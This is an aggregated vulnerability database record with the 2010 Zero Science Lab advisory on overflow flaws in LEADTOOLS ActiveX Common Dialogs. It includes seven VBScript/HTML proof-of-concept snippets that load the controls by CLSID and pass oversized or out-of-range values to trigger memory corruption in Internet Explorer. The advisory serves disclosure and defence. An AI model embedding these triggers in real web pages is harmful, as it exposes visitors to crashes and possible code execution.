ID

VAR-201009-0424


TITLE

LEADCOXImgEfxDlgu.dll Control Remote Code Execution Vulnerability in LEADTOOLS Imaging Common Dialogs

Trust: 0.6

sources: CNVD: CNVD-2010-1839

DESCRIPTION

LEADTOOLS Imaging Common Dialogs provides professional-grade imaging common dialogs for graphics processing, transformations, and effects. The LtocxImgEfxDlgu. ActiveX control provided by Imaging Common Dialogs does not properly filter input parameters. Users who are tricked into accessing malicious web pages and transmitting long parameters may cause arbitrary code execution.

An attacker may exploit these issues to execute arbitrary code within the context of the application (typically Internet Explorer) that invoked the ActiveX control. Failed exploit attempts will result in a denial-of-service condition.

Product Web Page: http://www.leadtools.com
Affected version: 16.5.0.2

Summary: With LEADTOOLS you can control any scanner, digital camera or capture card that has a TWAIN (32 and 64 bit) device driver. High-level acquisition support is included for ease of use while low-level functionality is provided for flexibility and control in even the most demanding scanning applications.

Desc: LEADTOOLS ActiveX Common Dialogs suffers from multiple remote vulnerabilities (IoF, BoF, DoS) as it fails to sanitize the input in different objects included in the Common Dialogs class.

ActiveX Common Dialogs (File) -------------------> LtocxFileDlgu.dll
- RegKey Safe for Script: True
- RegKey Safe for Init: True

Tested On: Microsoft Windows XP Professional SP3 (EN)
           Windows Internet Explorer 8.0.6001.18702
           RFgen Mobile Development Studio 4.0.0.06 (Enterprise)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk

24.08.2010

Zero Science Lab Advisory ID: ZSL-2010-4961
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4961.php

##############################################################
Proof of Concept:
##############################################################

1. (Web, LtocxWebDlgu.dll / LTRDWU.DLL):
------------------------------------------------------
<object classid='clsid:00165B53-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\RFGen40\LtocxWebDlgu.dll"
prototype = "Property Let Bitmap As Long"
memberName = "Bitmap"
progid = "LTRASTERDLGWEBLib_U.LEADRasterDlgWeb_U"
argCount = 1
arg1=-1
target.Bitmap = arg1
</script>

2. (Effects, LtocxEfxDlgu.dll / LTRDEU.DLL):
------------------------------------------------------
<object classid='clsid:00165B5B-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\RFGen40\LtocxEfxDlgu.dll"
prototype = "Property Let Bitmap As Long"
memberName = "Bitmap"
progid = "LTRASTERDLGEFXLib_U.LEADRasterDlgEfx_U"
argCount = 1
arg1=-1
target.Bitmap = arg1
</script>

3. (Image, LtocxImgDlgu.dll / LTRDMU.DLL):
------------------------------------------------------
<object classid='clsid:00165C7B-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\RFGen40\LtocxImgDlgu.dll"
prototype = "Property Let Bitmap As Long"
memberName = "Bitmap"
progid = "LTRASTERDLGIMGLib_U.LEADRasterDlgImg_U"
argCount = 1
arg1=2147483647
target.Bitmap = arg1
</script>

4. (Image Effects, LtocxImgEfxDlgu.dll / LTRDXU.DLL):
------------------------------------------------------
<object classid='clsid:00165B57-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\RFGen40\LtocxImgEfxDlgu.dll"
prototype = "Property Let Bitmap As Long"
memberName = "Bitmap"
progid = "LTRASTERDLGIMGEFXLib_U.LEADRasterDlgImgEfx_U"
argCount = 1
arg1=-2147483647
target.Bitmap = arg1
</script>

5. (Image Document, LtocxImgDocDlgu.dll / LTRDOU.DLL):
------------------------------------------------------
<object classid='clsid:00165B69-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\RFGen40\LtocxImgDocDlgu.dll"
prototype = "Property Let Bitmap As Long"
memberName = "Bitmap"
progid = "LTRASTERDLGIMGDOCLib_U.LEADRasterDlgImgDoc_U"
argCount = 1
arg1=2147483647
target.Bitmap = arg1
</script>

6. (Color, LtocxClrDlgu.dll / LTRDRU.DLL):
------------------------------------------------------
<object classid='clsid:00165B4F-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\LEAD Technologies\LEADTOOLS Active-X 16.5\Bin\CDLL\Win32\LtocxClrDlgu.dll"
prototype = "Property Let UserPalette ( ByVal iIndex As Integer ) As Long"
memberName = "UserPalette"
progid = "LTRASTERDLGCLRLib_U.LEADRasterDlgClr_U"
argCount = 2
arg1=1
arg2=-2147483647
target.UserPalette(arg1 ) = arg2
</script>

7. (File, LtocxFileDlgu.dll / LTRDFU.DLL):
------------------------------------------------------
<object classid='clsid:00165C87-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\RFGen40\LtocxFileDlgu.dll"
prototype = "Property Let DestinationPath As String"
memberName = "DestinationPath"
progid = "LTRASTERDLGFILELib_U.LEADRasterDlgFile_U"
argCount = 1
arg1=String(9236, "A")
target.DestinationPath = arg1
</script>

Trust: 4.23

sources: CNVD: CNVD-2010-1839 // CNVD: CNVD-2010-1838 // CNVD: CNVD-2010-1840 // CNVD: CNVD-2010-1837 // CNVD: CNVD-2010-1841 // CNVD: CNVD-2010-1842 // CNVD: CNVD-2010-1836 // BID: 42911 // ZSL: ZSL-2010-4961 // PACKETSTORM: 93403

IOT TAXONOMY

category: ['Network device'], sub_category: -

Trust: 4.2

sources: CNVD: CNVD-2010-1839 // CNVD: CNVD-2010-1838 // CNVD: CNVD-2010-1840 // CNVD: CNVD-2010-1837 // CNVD: CNVD-2010-1841 // CNVD: CNVD-2010-1842 // CNVD: CNVD-2010-1836

AFFECTED PRODUCTS

vendor: leadtools, model: imaging common dialogs, scope: eq, version: 16.5.0.2

Trust: 3.6

vendor: no, model: -, scope: -, version: -

Trust: 0.6

vendor: leadtools, model: imaging activex, scope: eq, version: 16.5

Trust: 0.3

vendor: lead, model: leadtools activex common dialogs, scope: eq, version: 16.5.0.2

Trust: 0.1

sources: ZSL: ZSL-2010-4961 // CNVD: CNVD-2010-1839 // CNVD: CNVD-2010-1838 // CNVD: CNVD-2010-1840 // CNVD: CNVD-2010-1837 // CNVD: CNVD-2010-1841 // CNVD: CNVD-2010-1842 // CNVD: CNVD-2010-1836 // BID: 42911

CVSS

SEVERITY

CVSSV2

CVSSV3

ZSL: ZSL-2010-4961
value: (4/5)

Trust: 0.1

sources: ZSL: ZSL-2010-4961

THREAT TYPE

network

Trust: 0.3

sources: BID: 42911

TYPE

Boundary Condition Error

Trust: 0.3

sources: BID: 42911

EXPLOIT AVAILABILITY

sources: ZSL: ZSL-2010-4961

EXTERNAL IDS

db: EXPLOIT-DB, id: 14852

Trust: 4.3

db: CNVD, id: CNVD-2010-1839

Trust: 0.6

db: CNVD, id: CNVD-2010-1838

Trust: 0.6

db: CNVD, id: CNVD-2010-1840

Trust: 0.6

db: CNVD, id: CNVD-2010-1837

Trust: 0.6

db: CNVD, id: CNVD-2010-1841

Trust: 0.6

db: CNVD, id: CNVD-2010-1842

Trust: 0.6

db: CNVD, id: CNVD-2010-1836

Trust: 0.6

db: BID, id: 42911

Trust: 0.4

db: ZSL, id: ZSL-2010-4961

Trust: 0.3

db: PACKETSTORM, id: 93403

Trust: 0.1

sources: ZSL: ZSL-2010-4961 // CNVD: CNVD-2010-1839 // CNVD: CNVD-2010-1838 // CNVD: CNVD-2010-1840 // CNVD: CNVD-2010-1837 // CNVD: CNVD-2010-1841 // CNVD: CNVD-2010-1842 // CNVD: CNVD-2010-1836 // BID: 42911 // PACKETSTORM: 93403

REFERENCES

url:http://www.exploit-db.com/exploits/14852/

Trust: 4.3

url:http://leadtools.com/downloads/default.htm

Trust: 0.3

url:http://www.leadtools.com/sdk/common-dialog/default.htm

Trust: 0.3

url:http://support.microsoft.com/kb/240797

Trust: 0.3

url:http://www.packetstormsecurity.org/filedesc/zsl-2010-4961.txt.html

Trust: 0.1

url:http://www.vfocus.net/art/20100902/7791.html

Trust: 0.1

url:http://www.venustech.com.cn/newsinfo/124/8057.html

Trust: 0.1

url:http://net-security.org/vuln.php?id=14060

Trust: 0.1

url:http://www.securityfocus.com/bid/42911

Trust: 0.1

url:http://www.leadtools.com

Trust: 0.1

url:http://www.zeroscience.mk/en/vulnerabilities/zsl-2010-4961.php

Trust: 0.1

url:http://www.zeroscience.mk

Trust: 0.1

sources: ZSL: ZSL-2010-4961 // CNVD: CNVD-2010-1839 // CNVD: CNVD-2010-1838 // CNVD: CNVD-2010-1840 // CNVD: CNVD-2010-1837 // CNVD: CNVD-2010-1841 // CNVD: CNVD-2010-1842 // CNVD: CNVD-2010-1836 // BID: 42911 // PACKETSTORM: 93403

CREDITS

LiquidWorm

Trust: 0.4

sources: BID: 42911 // PACKETSTORM: 93403

SOURCES

db: ZSL, id: ZSL-2010-4961
db: CNVD, id: CNVD-2010-1839
db: CNVD, id: CNVD-2010-1838
db: CNVD, id: CNVD-2010-1840
db: CNVD, id: CNVD-2010-1837
db: CNVD, id: CNVD-2010-1841
db: CNVD, id: CNVD-2010-1842
db: CNVD, id: CNVD-2010-1836
db: BID, id: 42911
db: PACKETSTORM, id: 93403

LAST UPDATE DATE

2022-10-19T22:39:18.968000+00:00


SOURCES UPDATE DATE

db: ZSL, id: ZSL-2010-4961, date: 2010-10-26T00:00:00
db: CNVD, id: CNVD-2010-1839, date: 2010-09-07T00:00:00
db: CNVD, id: CNVD-2010-1838, date: 2010-09-06T00:00:00
db: CNVD, id: CNVD-2010-1840, date: 2010-09-07T00:00:00
db: CNVD, id: CNVD-2010-1837, date: 2010-09-06T00:00:00
db: CNVD, id: CNVD-2010-1841, date: 2010-09-07T00:00:00
db: CNVD, id: CNVD-2010-1842, date: 2010-09-07T00:00:00
db: CNVD, id: CNVD-2010-1836, date: 2010-09-06T00:00:00
db: BID, id: 42911, date: 2010-09-01T00:00:00

SOURCES RELEASE DATE

db: ZSL, id: ZSL-2010-4961, date: 2010-09-01T00:00:00
db: CNVD, id: CNVD-2010-1839, date: 2010-09-07T00:00:00
db: CNVD, id: CNVD-2010-1838, date: 2010-09-06T00:00:00
db: CNVD, id: CNVD-2010-1840, date: 2010-09-07T00:00:00
db: CNVD, id: CNVD-2010-1837, date: 2010-09-06T00:00:00
db: CNVD, id: CNVD-2010-1841, date: 2010-09-07T00:00:00
db: CNVD, id: CNVD-2010-1842, date: 2010-09-07T00:00:00
db: CNVD, id: CNVD-2010-1836, date: 2010-09-06T00:00:00
db: BID, id: 42911, date: 2010-09-01T00:00:00
db: PACKETSTORM, id: 93403, date: 2010-09-01T20:24:41